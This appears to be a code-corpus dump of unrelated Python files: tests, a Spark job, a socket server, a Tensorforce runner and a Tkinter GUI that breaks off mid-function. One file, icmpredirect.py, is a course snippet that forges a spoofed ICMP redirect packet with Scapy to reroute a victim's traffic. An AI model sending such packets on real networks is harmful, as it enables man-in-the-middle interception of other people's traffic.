max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
altair_saver/savers/tests/test_html.py | RoyalTS/altair_saver | 0 | 12762151 | import io
import json
import os
from typing import Any, Dict, IO, Iterator, Optional, Tuple
from altair_data_server import Provider
from PIL import Image
import pytest
import selenium.webdriver
from selenium.webdriver.remote.webdriver import WebDriver
from altair_saver import HTMLSaver
from altair_saver._utils import internet_connected
CDN_URL = "https://cdn.jsdelivr.net"
@pytest.fixture(scope="module")
def internet_ok() -> bool:
return internet_connected()
@pytest.fixture(scope="module")
def provider() -> Iterator[Provider]:
provider = Provider()
yield provider
provider.stop()
@pytest.fixture(scope="module")
def driver() -> Iterator[WebDriver]:
options = selenium.webdriver.chrome.options.Options()
options.add_argument("--headless")
if hasattr(os, "geteuid") and (os.geteuid() == 0):
options.add_argument("--no-sandbox")
driver = selenium.webdriver.Chrome(options=options)
yield driver
driver.quit()
def get_testcases() -> Iterator[Tuple[str, Dict[str, Any]]]:
directory = os.path.join(os.path.dirname(__file__), "testcases")
cases = set(f.split(".")[0] for f in os.listdir(directory))
f: IO
for case in sorted(cases):
with open(os.path.join(directory, f"{case}.vl.json")) as f:
vl = json.load(f)
with open(os.path.join(directory, f"{case}.png"), "rb") as f:
png = f.read()
yield case, {"vega-lite": vl, "png": png}
@pytest.mark.parametrize("inline", [True, False])
@pytest.mark.parametrize("embed_options", [None, {"theme": "dark"}])
@pytest.mark.parametrize("case, data", get_testcases())
def test_html_save(
case: str, data: Dict[str, Any], embed_options: Optional[dict], inline: bool
) -> None:
saver = HTMLSaver(data["vega-lite"], inline=inline, embed_options=embed_options)
fp = io.StringIO()
saver.save(fp, "html")
html = fp.getvalue()
assert isinstance(html, str)
assert html.strip().startswith("<!DOCTYPE html>")
assert json.dumps(data["vega-lite"]) in html
assert f"const embedOpt = {json.dumps(embed_options or {})}" in html
if inline:
assert CDN_URL not in html
else:
assert CDN_URL in html
@pytest.mark.parametrize("embed_options", [None, {"theme": "dark"}])
@pytest.mark.parametrize("case, data", get_testcases())
def test_html_mimebundle(
case: str, data: Dict[str, Any], embed_options: Optional[dict],
) -> None:
saver = HTMLSaver(data["vega-lite"], embed_options=embed_options)
bundle = saver.mimebundle("html")
assert bundle.keys() == {"text/html"}
html = bundle["text/html"]
assert isinstance(html, str)
assert html.strip().startswith("<div")
assert json.dumps(data["vega-lite"]) in html
assert json.dumps(embed_options or {}) in html
assert CDN_URL in html
def test_bad_format() -> None:
saver = HTMLSaver({})
with pytest.raises(ValueError):
saver.mimebundle("vega")
@pytest.mark.parametrize("case, data", get_testcases())
@pytest.mark.parametrize("inline", [True, False])
def test_html_save_rendering(
provider: Provider,
driver: WebDriver,
case: str,
data: Dict[str, Any],
inline: bool,
internet_ok: bool,
) -> None:
if not (inline or internet_ok):
pytest.xfail("Internet connection not available")
saver = HTMLSaver(data["vega-lite"], inline=inline)
fp = io.StringIO()
saver.save(fp, "html")
html = fp.getvalue()
resource = provider.create(content=html, extension="html")
driver.set_window_size(800, 600)
driver.get(resource.url)
element = driver.find_element_by_class_name("vega-visualization")
png = driver.get_screenshot_as_png()
im = Image.open(io.BytesIO(png))
left = element.location["x"]
top = element.location["y"]
right = element.location["x"] + element.size["width"]
bottom = element.location["y"] + element.size["height"]
im = im.crop((left, top, right, bottom))
im_expected = Image.open(io.BytesIO(data["png"]))
assert abs(im.size[0] - im_expected.size[0]) < 40
assert abs(im.size[1] - im_expected.size[1]) < 40
@pytest.mark.parametrize("requirejs", [True, False])
@pytest.mark.parametrize("case, data", get_testcases())
def test_html_mimebundle_rendering(
provider: Provider,
driver: WebDriver,
case: str,
data: Dict[str, Any],
requirejs: bool,
internet_ok: bool,
) -> None:
if not internet_ok:
pytest.xfail("Internet connection not available")
saver = HTMLSaver(data["vega-lite"])
bundle = saver.mimebundle("html")
html = bundle["text/html"]
assert isinstance(html, str)
if requirejs:
html = f"""<!DOCTYPE html>
<html>
<head><script src="{CDN_URL}/npm/requirejs@2.3.6"></script></head>
<body>{html}</body>
</html>
"""
else:
html = f"<html>{html}</html>"
resource = provider.create(content=html, extension="html")
driver.set_window_size(800, 600)
driver.get(resource.url)
element = driver.find_element_by_class_name("vega-visualization")
png = driver.get_screenshot_as_png()
im = Image.open(io.BytesIO(png))
left = element.location["x"]
top = element.location["y"]
right = element.location["x"] + element.size["width"]
bottom = element.location["y"] + element.size["height"]
im = im.crop((left, top, right, bottom))
im_expected = Image.open(io.BytesIO(data["png"]))
assert abs(im.size[0] - im_expected.size[0]) < 40
assert abs(im.size[1] - im_expected.size[1]) < 40
| 2.203125 | 2 |
icmpredirect.py | haelee/allbypythonself | 3 | 12762152 | <reponame>haelee/allbypythonself<filename>icmpredirect.py
# All-by-Pythonself
# Snippet for ICMP redirect attacks
# by <NAME>
# at Cheongju University
from scapy . all import *
p = IP (src = "10.0.2.1", dst = "10.0.2.4") / ICMP (type = 5, code = 1, gw = "10.0.2.15") / IP (src = "10.0.2.4", dst = "172.16.17.32") / UDP ()
send (p)
| 1.992188 | 2 |
mepo.d/command/config/config.py | GEOS-ESM/mepo | 0 | 12762153 | import subprocess as sp
from state.state import MepoState
from command.config.get import get
from command.config.set import set
from command.config.delete import delete
from command.config.print import print
def run(args):
d = {
'get': get,
'set': set,
'delete': delete,
'print': print
}
d[args.mepo_config_cmd].run(args)
| 1.984375 | 2 |
hexomap/npmath.py | GrayFrazierCMU/HEXOMAP | 11 | 12762154 | <filename>hexomap/npmath.py
#!/usr/bin/env python
# -*- coding: UTF-8 no BOM -*-
"""
Useful math functions for processing HEDM data implemented in numpy.
"""
import numpy as np
from numpy.linalg import norm
def normalize(vec, axis=None):
"""
return a normalized vector/matrix
axis=None : normalize entire vector/matrix
axis=0 : normalize by column
axis=1 : normalize by row
"""
vec = np.array(vec, dtype=np.float64)
if axis is None:
return vec/norm(vec)
else:
return np.divide(vec,
np.tile(norm(vec, axis=axis),
vec.shape[axis],
).reshape(vec.shape,
order='F' if axis == 1 else 'C',
)
)
def random_three_vector():
"""
Generates a random 3D unit vector (direction) with a uniform spherical
distribution Algo from
http://stackoverflow.com/questions/5408276/python-uniform-spherical-distribution
"""
phi = np.random.uniform(0, np.pi*2)
costheta = np.random.uniform(-1, 1)
theta = np.arccos(costheta)
x = np.sin(theta) * np.cos(phi)
y = np.sin(theta) * np.sin(phi)
z = np.cos(theta)
return np.array([x, y, z])
def safe_dotprod(vec1, vec2):
"""
Return the dot product that is forced to be between -1.0 and 1.0. Both
vectors are normalized to prevent error.
"""
return min(1.0, max(-1.0, np.dot(normalize(vec1), normalize(vec2))))
def ang_between(vec1: np.ndarray, vec2: np.ndarray) -> float:
"""return the angle (radians) bewteen vec1 and vec2"""
return np.arccos(np.dot(normalize(vec1), normalize(vec2)))
if __name__ == "__main__":
pass | 3.09375 | 3 |
repo/script.module.liveresolver/lib/js2py/pyjs.py | Hades01/Addons | 3 | 12762155 | from base import *
from constructors.jsmath import Math
from constructors.jsdate import Date
from constructors.jsobject import Object
from constructors.jsfunction import Function
from constructors.jsstring import String
from constructors.jsnumber import Number
from constructors.jsboolean import Boolean
from constructors.jsregexp import RegExp
from constructors.jsarray import Array
from prototypes.jsjson import JSON
from host.console import console
from host.jseval import Eval
from host.jsfunctions import parseFloat, parseInt, isFinite, isNaN
# Now we have all the necessary items to create global environment for script
__all__ = ['Js', 'PyJsComma', 'PyJsStrictEq', 'PyJsStrictNeq',
'PyJsException', 'PyJsBshift', 'Scope', 'PyExceptionToJs',
'JsToPyException', 'JS_BUILTINS', 'appengine', 'set_global_object',
'JsRegExp', 'PyJsException', 'PyExceptionToJs', 'JsToPyException', 'PyJsSwitchException']
# these were defined in base.py
builtins = ('true','false','null','undefined','Infinity',
'NaN', 'console', 'String', 'Number', 'Boolean', 'RegExp',
'Math', 'Date', 'Object', 'Function', 'Array',
'parseFloat', 'parseInt', 'isFinite', 'isNaN')
#Array, Function, JSON, Error is done later :)
# also some built in functions like eval...
def set_global_object(obj):
obj.IS_CHILD_SCOPE = False
this = This({})
this.own = obj.own
this.prototype = obj.prototype
PyJs.GlobalObject = this
# make this available
obj.register('this')
obj.put('this', this)
scope = dict(zip(builtins, [globals()[e] for e in builtins]))
# Now add errors:
for name, error in ERRORS.iteritems():
scope[name] = error
#add eval
scope['eval'] = Eval
scope['JSON'] = JSON
JS_BUILTINS = {}
#k:v for k,v in scope.iteritems()
for k,v in scope.iteritems():
JS_BUILTINS[k] = v
| 2.15625 | 2 |
test/PyPrometheus_test.py | RusDavies/PyPrometheus | 0 | 12762156 | import unittest
from PyPrometheus import Prometheus
from pathlib import Path
import urllib3
from datetime import datetime, timedelta
import json
urllib3.disable_warnings()
def delete_folder(pth:Path) -> None:
if (pth.exists()):
for sub in pth.iterdir():
if (sub.is_dir()):
delete_folder(sub)
else:
sub.unlink()
pth.rmdir()
return
class TestPyPrometheus(unittest.TestCase):
@classmethod
def setUpClass(cls):
with open('./test/config_test_TestPyPrometheus.json', 'r') as file:
tmp = file.read()
cls.test_config = json.loads(tmp)
# Fixup file and path strings into Path objects
for item in ['cache_path', 'metrics_config_file']:
cls.test_config[item] = Path(cls.test_config[item])
# Get our metrics configuration
with open(cls.test_config['metrics_config_file'], 'r') as file:
tmp = file.read()
cls.metrics = json.loads(tmp)
cls.api_url = cls.test_config['url']
cls.ssl_verify = cls.test_config['ssl_verify']
cls.configfile = cls.test_config['metrics_config_file']
cls.filename = cls.test_config['test_data']
cls.cache_path = cls.test_config['cache_path']
return
def setUp(self) -> None:
delete_folder(self.cache_path)
return super().setUp()
def _instantiate_instance(self):
iut = Prometheus(self.api_url, metrics_config_file=self.configfile, cache_path=self.cache_path, ssl_verify=self.ssl_verify)
return iut
@unittest.skip
def test_constructor(self):
iut = self._instantiate_instance()
self.assertIsNotNone( iut )
return
@unittest.skip
def test_load_metrics_config(self):
iut = self._instantiate_instance()
# The object should have a _load_metrics_config attribute
self.assertTrue( hasattr(iut, '_load_metrics_config' ) )
# Run the method, with a passed config file
iut._load_metrics_config(self.configfile)
self.assertTrue( hasattr(iut, '_metrics_config' ) )
self.assertIsNotNone( iut._metrics_config )
# Make sure we loaded what we expected
self.assertIsNotNone( iut._metrics_config.get('node_disk_read_bytes_total', None))
self.assertIsNotNone( iut._metrics_config.get('node_filesystem_avail_bytes', None) )
self.assertIsNotNone( iut._metrics_config.get('node_load1', None) )
return
@unittest.skip
def test_load_metrics_config_exception_no_metrics_file(self):
iut = self._instantiate_instance()
expected_exception = False
expected_exception_msg = 'No metrics config file set. Cannot continue.'
try:
iut._load_metrics_config()
except ValueError as e:
if(e.args[0] == expected_exception_msg):
expected_exception =True
except Exception as e:
self.fail('Recevied an unexpected exception: {}'.format(e))
self.assertTrue(expected_exception)
return
@unittest.skip
def test_load_metrics_config_exception_metrics_file_does_not_exist(self):
iut = self._instantiate_instance()
path = Path('./does_not_exist.conf')
if(path.exists()):
raise ValueError("The file '{}' shouldn't exist fopr this test, yet it actually does. Weird!".format(path))
expected_exception = False
expected_exception_msg = "The configuration file '{}' does not exist".format(path)
try:
iut._load_metrics_config(path)
except ValueError as e:
if(e.args[0] == expected_exception_msg):
expected_exception =True
except Exception as e:
self.fail('Recevied an unexpected exception: {}'.format(e))
self.assertTrue(expected_exception)
return
@unittest.skip
def test_get_metrics(self):
self.assertFalse( True )
return
<EMAIL>
def test_get_metric(self):
iut = self._instantiate_instance()
metric = list(iut._metrics_config.keys())[0]
endtime = datetime.now()
starttime = endtime - timedelta(hours=1)
result = iut.get_metric(metric, starttime=starttime, endtime=endtime)
self.assertIsNotNone( result )
result_item = iut.prometheus_data.get(metric, None)
self.assertIsNotNone( result_item )
self.assertIsNotNone( result_item.get('data', None))
self.assertIsNotNone( result_item.get('df', None))
return
if (__name__ == '__main__'):
unittest.main()
| 2.234375 | 2 |
carling/io/__init__.py | mc-digital/carling | 6 | 12762157 | from .avro_schema import generate_avro_schema_from_template, load_avro_schema
__all__ = (
"generate_avro_schema_from_template",
"load_avro_schema",
)
| 1.09375 | 1 |
phase2/main.py | rewrihitesh/wikipedia-search-engine | 0 | 12762158 | from timeit import default_timer
from parser import wikihandler
import xml.sax as sax
import utility
def main():
# setting path to indices
utility.setIndexPath()
utility.setStatPath()
# parser=sax.make_parser()
# handler = wikihandler()
# parser.setFeature(sax.handler.feature_namespaces,0)
# parser.setContentHandler(handler)
# parser.parse("/home/hitesh/sem3/IRE/Project/large.xml")
# parser.parse("/home/hitesh/sem3/IRE/wiki/phase2/large.xml")
# parser.parse("/mnt/sdb1/phase2/data/0.xml") # 1
# parser.parse("/mnt/sdb1/phase2/data/1.xml") # 2
# parser.parse("/mnt/sdb1/phase2/data/29.xml") # 3
for i in range(0,35):
start = default_timer()
parser=sax.make_parser()
handler = wikihandler()
parser.setFeature(sax.handler.feature_namespaces,0)
parser.setContentHandler(handler)
# this is the path to ur indices
parser.parse("/mnt/sdb1/phase2/data/"+str(i)+".xml")
stop = default_timer()
print ('\nTime elasped in sec: ',stop - start)
print('file no.:: ',str(i))
#wrie index here
# handler.writeIndex(utility.getIndexPath()) # temp
if __name__ == "__main__":
start = default_timer()
main()
stop = default_timer()
print ('\nTotal Time elasped in sec: ',stop - start)
| 2.59375 | 3 |
boto3_exceptions/elb.py | siteshen/boto3_exceptions | 2 | 12762159 | import boto3
exceptions = boto3.client('elb').exceptions
AccessPointNotFoundException = exceptions.AccessPointNotFoundException
CertificateNotFoundException = exceptions.CertificateNotFoundException
DependencyThrottleException = exceptions.DependencyThrottleException
DuplicateAccessPointNameException = exceptions.DuplicateAccessPointNameException
DuplicateListenerException = exceptions.DuplicateListenerException
DuplicatePolicyNameException = exceptions.DuplicatePolicyNameException
DuplicateTagKeysException = exceptions.DuplicateTagKeysException
InvalidConfigurationRequestException = exceptions.InvalidConfigurationRequestException
InvalidEndPointException = exceptions.InvalidEndPointException
InvalidSchemeException = exceptions.InvalidSchemeException
InvalidSecurityGroupException = exceptions.InvalidSecurityGroupException
InvalidSubnetException = exceptions.InvalidSubnetException
ListenerNotFoundException = exceptions.ListenerNotFoundException
LoadBalancerAttributeNotFoundException = exceptions.LoadBalancerAttributeNotFoundException
OperationNotPermittedException = exceptions.OperationNotPermittedException
PolicyNotFoundException = exceptions.PolicyNotFoundException
PolicyTypeNotFoundException = exceptions.PolicyTypeNotFoundException
SubnetNotFoundException = exceptions.SubnetNotFoundException
TooManyAccessPointsException = exceptions.TooManyAccessPointsException
TooManyPoliciesException = exceptions.TooManyPoliciesException
TooManyTagsException = exceptions.TooManyTagsException
UnsupportedProtocolException = exceptions.UnsupportedProtocolException
| 1.625 | 2 |
adminmgr/media/code/A3/task3/BD_167_260_770_7882_A4COXPP.py | IamMayankThakur/test-bigdata | 9 | 12762160 | <filename>adminmgr/media/code/A3/task3/BD_167_260_770_7882_A4COXPP.py
#!/usr/bin/python3
import findspark
findspark.init()
from pyspark import SparkConf,SparkContext
from pyspark.streaming import StreamingContext
from pyspark.sql import Row,SQLContext
import sys
import requests
def process_rdd1(time,rdd):
i=0
value=rdd.collect()
value1=value[0:5]
#print(value1)
for K,V in value1:
i=i+1
print("%s"%(K), end="")
if(i<5):
print(',', end="")
else:
print()
conf=SparkConf()
conf.setAppName("BigData")
sc=SparkContext(conf=conf)
ssc=StreamingContext(sc,int(sys.argv[2]))
ssc.checkpoint("~/checkpoint_BIGDATA")
dataStream=ssc.socketTextStream("localhost",9009)
# dataStream.pprint()
dataStream=dataStream.window(int(sys.argv[1]),1)
hashtags=dataStream.map(lambda w: w.split(';')[7])
#hashtags.pprint()
hashtags=hashtags.map(lambda x: (x,1))
hashtags=hashtags.map(lambda x: x[0].split(','))
hashtags=hashtags.flatMap(lambda x: x)
hashtags=hashtags.map(lambda x:(x,1))
hashtags=hashtags.filter(lambda x: x[0] is not '')
hashtag=hashtags.reduceByKey(lambda x,y: x+y)
#hashtag.pprint()
hashtag= hashtag.transform(lambda x: x.sortBy(lambda y:(-y[1],y[0])))
hashtag.foreachRDD(process_rdd1)
ssc.start()
ssc.awaitTermination(25)
ssc.stop()
| 2.21875 | 2 |
sockets/MiServidorCreado.py | Invarato/Jarroba | 2 | 12762161 | <reponame>Invarato/Jarroba<gh_stars>1-10
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Nuestro Servidor Software sobre el Servidor Físico
import socketserver
# Dirección IP
HOST = "192.168.127.12"
# El puerto privado que queramos escuchar, uno de los comprendidos entre 49152 y 65535 1-65535
PORT = 50000
class MiControladorTCP(socketserver.BaseRequestHandler):
"""
La clase que controlará las peticiones para nuestro servidor.
It is instantiated once per connection to the server, and must
override the handle() method to implement communication to the
client.
"""
def handle(self):
"""
Método sobrescrito para controlar la comunicación que ocurra ne nuestro servidor.
Aquí recibiremos los mensajes del cliente y le responderemos
"""
print('[Servidor 3] Cliente conectado desde: {}'.format(self.client_address[0]))
socket_abierto = True
while socket_abierto:
print('[Servidor 4] Esperando por petición del cliente...')
dato_recibido_en_bytes = self.request.recv(1024).strip()
if dato_recibido_en_bytes:
dato_recibido_en_str = dato_recibido_en_bytes.decode("utf-8")
print('[Servidor 5] Recibido desde el cliente: {}'.format(dato_recibido_en_str))
respuesta_en_str = "## RESPUESTA DEL SERVIDOR: {} ##".format(dato_recibido_en_str)
self.request.sendall(bytes(respuesta_en_str, encoding='utf8'))
print('[Servidor 6] Se ha respondido al cliente con el mensaje: {}'.format(respuesta_en_str))
else:
print('[Servidor 7] El cliente ha cerrado el Socket desde su lado, cerrando socket desde el Servidor...')
socket_abierto = False
if __name__ == "__main__":
tupla_para_el_enlace = (HOST, PORT)
try:
print('[Servidor 1] Enlazando Socket en: {}'.format(tupla_para_el_enlace))
with socketserver.TCPServer(tupla_para_el_enlace, MiControladorTCP) as servidor:
print('[Servidor 2] Iniciando bucle del servidor. Para interrumpir pulsar a la vez las teclas: [Ctrl]+[C]')
servidor.serve_forever()
except KeyboardInterrupt:
print('[Servidor 8] Interrupción por teclado')
finally:
if servidor is not None:
servidor.shutdown()
print('[Servidor 9] Servidor Cerrado')
| 3.140625 | 3 |
run.py | Woellchen/tensorforce | 0 | 12762162 | <gh_stars>0
# Copyright 2020 Tensorforce Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import argparse
import importlib
import json
import os
import matplotlib
import numpy as np
from tensorforce.agents import Agent
from tensorforce.core.utils.json_encoder import NumpyJSONEncoder
from tensorforce.environments import Environment
from tensorforce.execution import Runner
matplotlib.use('Agg')
import matplotlib.pyplot as plt
def main():
parser = argparse.ArgumentParser(description='Tensorforce runner')
# Agent arguments
parser.add_argument(
'-a', '--agent', type=str, default=None,
help='Agent (name, configuration JSON file, or library module)'
)
parser.add_argument(
'-n', '--network', type=str, default=None,
help='Network (name, configuration JSON file, or library module)'
)
# Environment arguments
parser.add_argument(
'-e', '--environment', type=str, default=None,
help='Environment (name, configuration JSON file, or library module)'
)
parser.add_argument(
'-l', '--level', type=str, default=None,
help='Level or game id, like `CartPole-v1`, if supported'
)
parser.add_argument(
'-m', '--max-episode-timesteps', type=int, default=None,
help='Maximum number of timesteps per episode'
)
parser.add_argument(
'--visualize', action='store_true',
help='Visualize agent--environment interaction, if supported'
)
parser.add_argument(
'--visualize-directory', type=str, default=None,
help='Directory to store videos of agent--environment interaction, if supported'
)
parser.add_argument(
'--import-modules', type=str, default=None,
help='Import comma-separated modules required for environment'
)
# Parallel execution arguments
parser.add_argument(
'--num-parallel', type=int, default=None,
help='Number of environment instances to execute in parallel'
)
parser.add_argument(
'--batch-agent-calls', action='store_true',
help='Batch agent calls for parallel environment execution'
)
parser.add_argument(
'--sync-timesteps', action='store_true',
help='Synchronize parallel environment execution on timestep-level'
)
parser.add_argument(
'--sync-episodes', action='store_true',
help='Synchronize parallel environment execution on episode-level'
)
parser.add_argument(
'--remote', type=str, choices=('multiprocessing', 'socket-client', 'socket-server'),
default=None, help='Communication mode for remote environment execution of parallelized'
'environment execution'
)
parser.add_argument(
'--blocking', action='store_true', help='Remote environments should be blocking'
)
parser.add_argument(
'--host', type=str, default=None,
help='Socket server hostname(s) or IP address(es), single value or comma-separated list'
)
parser.add_argument(
'--port', type=str, default=None,
help='Socket server port(s), single value or comma-separated list, increasing sequence if'
'single host and port given'
)
# Runner arguments
parser.add_argument(
'-v', '--evaluation', action='store_true',
help='Run environment (last if multiple) in evaluation mode'
)
parser.add_argument('-p', '--episodes', type=int, default=None, help='Number of episodes')
parser.add_argument('-t', '--timesteps', type=int, default=None, help='Number of timesteps')
parser.add_argument('-u', '--updates', type=int, default=None, help='Number of agent updates')
parser.add_argument(
'--mean-horizon', type=int, default=1,
help='Number of episodes progress bar values and evaluation score are averaged over'
)
parser.add_argument(
'--save-best-agent', type=str, default=None,
help='Directory to save the best version of the agent according to the evaluation score'
)
# Logging arguments
parser.add_argument('-r', '--repeat', type=int, default=1, help='Number of repetitions')
parser.add_argument(
'--path', type=str, default=None,
help='Logging path, directory plus filename without extension'
)
parser.add_argument('--seaborn', action='store_true', help='Use seaborn')
args = parser.parse_args()
if args.import_modules is not None:
for module in args.import_modules.split(','):
importlib.import_module(name=module)
if args.path is None:
callback = None
else:
assert os.path.splitext(args.path)[1] == ''
assert args.episodes is not None and args.visualize is not None
rewards = [list() for _ in range(args.episodes)]
timesteps = [list() for _ in range(args.episodes)]
seconds = [list() for _ in range(args.episodes)]
agent_seconds = [list() for _ in range(args.episodes)]
def callback(r):
rewards[r.episodes - 1].append(r.episode_rewards[-1])
timesteps[r.episodes - 1].append(r.episode_timesteps[-1])
seconds[r.episodes - 1].append(r.episode_seconds[-1])
agent_seconds[r.episodes - 1].append(r.episode_agent_seconds[-1])
return True
if args.environment is None:
environment = None
else:
environment = dict(environment=args.environment)
if args.level is not None:
environment['level'] = args.level
if args.visualize:
environment['visualize'] = True
if args.visualize_directory is not None:
environment['visualize_directory'] = args.visualize_directory
if args.host is not None and ',' in args.host:
args.host = args.host.split(',')
if args.port is not None and ',' in args.port:
args.port = [int(x) for x in args.port.split(',')]
elif args.port is not None:
args.port = int(args.port)
if args.remote == 'socket-server':
Environment.create(
environment=environment, max_episode_timesteps=args.max_episode_timesteps,
remote=args.remote, port=args.port
)
return
if args.agent is None:
agent = None
else:
agent = dict(agent=args.agent)
if args.network is not None:
agent['network'] = args.network
for _ in range(args.repeat):
runner = Runner(
agent=agent, environment=environment, max_episode_timesteps=args.max_episode_timesteps,
evaluation=args.evaluation, num_parallel=args.num_parallel, remote=args.remote,
blocking=args.blocking, host=args.host, port=args.port
)
runner.run(
num_episodes=args.episodes, num_timesteps=args.timesteps, num_updates=args.updates,
batch_agent_calls=args.batch_agent_calls, sync_timesteps=args.sync_timesteps,
sync_episodes=args.sync_episodes, callback=callback, mean_horizon=args.mean_horizon,
save_best_agent=args.save_best_agent
)
runner.close()
if args.path is not None:
directory = os.path.split(args.path)[0]
if directory != '' and not os.path.isdir(directory):
os.makedirs(directory, exist_ok=True)
with open(args.path + '.json', 'w') as filehandle:
filehandle.write(
json.dumps(dict(
rewards=rewards, timesteps=timesteps, seconds=seconds,
agent_seconds=agent_seconds
), cls=NumpyJSONEncoder)
)
if args.seaborn:
import seaborn as sns
sns.set()
xs = np.arange(len(rewards))
min_rewards = np.amin(rewards, axis=1)
max_rewards = np.amax(rewards, axis=1)
median_rewards = np.median(rewards, axis=1)
plt.plot(xs, median_rewards, color='green', linewidth=2.0)
plt.fill_between(xs, min_rewards, max_rewards, color='green', alpha=0.4)
plt.xlabel('episodes')
plt.ylabel('reward')
plt.savefig(fname=(args.path + '.png'))
if __name__ == '__main__':
main()
| 2.140625 | 2 |
custom tools/generate_txt.py | junhai0428/YOLOX-OBB | 36 | 12762163 | # import os
#
# # path = '/home/yangyang/yangyang/DATA/gxw/dataset/DOTA_split/train'
# # label_file_name = 'labelTxt'
#
# path = '/home/yangyang/yangyang/DATA/gxw/dataset/DOTA_demo/VOC2012'
# label_file_name = 'Annotations'
#
# label_file_path = os.path.join(path, label_file_name)
# filelist = os.listdir(label_file_path)
#
# # txt_path = os.path.join(path, 'train.txt')
# txt_path = os.path.join(path, 'train.txt')
# f = open(txt_path, 'a')
#
# for filename in filelist:
# txt = filename.split('.')[0]
# f.write('{}\n'.format(txt))
#
# f.close()
import os
label_file_path = '/home/lyy/gxw/DOTA_OBB_1_5/VOC2012/JPEGImages-test'
filelist = os.listdir(label_file_path)
path = '/home/lyy/gxw'
txt_path = os.path.join(path, 'test.txt')
f = open(txt_path, 'a')
for filename in filelist:
txt = filename.split('.')[0]
f.write('{}\n'.format(txt))
f.close() | 2.40625 | 2 |
django_private_beta/urls.py | andytwoods/Django-Private-Beta | 0 | 12762164 | <filename>django_private_beta/urls.py
from django.conf.urls import url
from . import views
app_name = 'private_beta'
urlpatterns = [
url(r'^private_beta/', views.PrivateBeta.as_view(), name='private_beta'),
]
| 1.609375 | 2 |
pywire/test_suite.py | Verkhovskaya/PyDL | 5 | 12762165 | from pywire.signal import Signal
from tkinter import *
from tkinter.ttk import Separator
from enum import Enum
class BitState(Enum):
TRUE = 1
FALSE = 2
TRUE_FORCED = 3
FALSE_FORCED = 4
UNDEFINED = 5
def bitsToInt(bit_array):
for bit in bit_array:
if bit.state == BitState.UNDEFINED:
return None
total = 0
for index in range(len(bit_array)):
bit = bit_array[index]
total *= 2
if bit.state == BitState.TRUE_FORCED or bit.state == BitState.TRUE:
total += 1
return total
class Bit:
def press(self):
print("PRESSED")
if self.state == BitState.UNDEFINED:
self.state = BitState.TRUE_FORCED
elif self.state == BitState.TRUE_FORCED:
self.state = BitState.FALSE_FORCED
elif self.state == BitState.FALSE_FORCED:
self.state = BitState.UNDEFINED
elif self.state == BitState.TRUE:
self.state = BitState.TRUE_FORCED
elif self.state == BitState.FALSE:
self.state = BitState.TRUE_FORCED
else:
raise Exception("WTF")
self.update_gui()
def update_gui(self):
if self.state == BitState.UNDEFINED:
self.entity.configure(text="UN")
elif self.state == BitState.TRUE_FORCED:
self.entity.configure(text="TF")
elif self.state == BitState.FALSE_FORCED:
self.entity.configure(text="FF")
elif self.state == BitState.TRUE:
self.entity.configure(text="T_")
elif self.state == BitState.FALSE:
self.entity.configure(text="F_")
else:
raise Exception("WTF: " + str(self.state))
def __init__(self, master, row, column):
self.entity = Button(master,
command=self.press)
self.entity.grid(row=row, column=column)
self.state = BitState.FALSE
self.update_gui()
def refresh():
globals()["app"].recalculate_states()
class Application(Frame):
def draw_signals(self, master, signals, start_row):
for signal in signals:
self.bits[signal.name] = [[None for bit_index in range(len(signal))] for t in range(self.time)]
print("LABEL")
Label(master, text=signal.name).grid(row=start_row, column=1)
for bit_index in range(len(signal)):
Label(master, text="<" + str(bit_index) + ">").grid(row=start_row, column=2)
for time_stamp in range(self.time):
self.bits[signal.name][time_stamp][bit_index] = Bit(master, start_row, time_stamp + 3)
Separator(master, orient="horizontal").grid(row=start_row, column=time_stamp + 3, sticky=S + W + E)
start_row += 1
start_row += 1
print("done")
def createLayout(self, master):
Button(master, text="Refresh", command=refresh).grid(row=0, column=0)
for x in range(self.time):
Label(master, text="t=" + str(x)).grid(row=1, column=x+3)
row = 2
if self.input_signals:
Label(master, text="inputs").grid(row=row, column=0)
self.draw_signals(master, self.input_signals, row)
row += sum([len(signal) for signal in self.input_signals])+3
Label(master, text=" ").grid(row=row-1, column=0)
if self.other_signals:
Label(master, text="other").grid(row=row, column=0)
self.draw_signals(master, self.other_signals, row)
row += sum([len(signal) for signal in self.other_signals]) + 3
Label(master, text=" ").grid(row=row-1, column=0)
if self.output_signals:
Label(master, text="outputs").grid(row=row, column=0)
self.draw_signals(master, self.output_signals, row)
row += sum([len(signal) for signal in self.output_signals]) + 3
Label(master, text=" ").grid(row=row-1, column=0)
def recalculate_states(self):
for time_stamp in range(0, self.time):
for signal in Signal.all_signals:
if signal.driving_signals:
input_states = []
for input_signal in signal.driving_signals:
if signal.clock:
input_bits = self.bits[input_signal.name][time_stamp-1]
else:
input_bits = self.bits[input_signal.name][time_stamp]
input_states.append(bitsToInt(input_bits))
output_val = signal.driving_function(*input_states)
if isinstance(output_val, int):
output_string = bin(output_val)[2:].rjust(len(signal), "0")
output_string = output_string[len(output_string)-len(signal):]
print(output_string)
output_bool_array = [letter == "1" for letter in output_string]
print(output_bool_array)
signal_bits = self.bits[signal.name][time_stamp]
for index in range(len(output_bool_array)):
if signal_bits[index].state == BitState.TRUE_FORCED:
pass
elif signal_bits[index].state == BitState.FALSE_FORCED:
pass
elif output_bool_array[index]:
signal_bits[index].state = BitState.TRUE
else:
signal_bits[index].state = BitState.FALSE
elif isinstance(output_val, bool):
for index in range(len(output_bool_array)):
if output_val:
signal_bits[index] = BitState.TRUE
else:
signal_bits[index] = BitState.FALSE
else:
raise Exception("Function output is not a boolean or int")
for signal in Signal.all_signals:
for bit_row in self.bits[signal.name]:
for bit in bit_row:
bit.update_gui()
def __init__(self, master=None):
self.bits = {}
self.time = 10
signals = Signal.all_signals
self.input_signals = list(filter(lambda x: x.io == "in", signals))
self.output_signals = list(filter(lambda x: x.io == "out", signals))
self.other_signals = list(filter(lambda x: not x.io, signals))
Frame.__init__(self, master)
print("Creating layout")
self.createLayout(master)
print("DONE")
self.recalculate_states()
def launch_test():
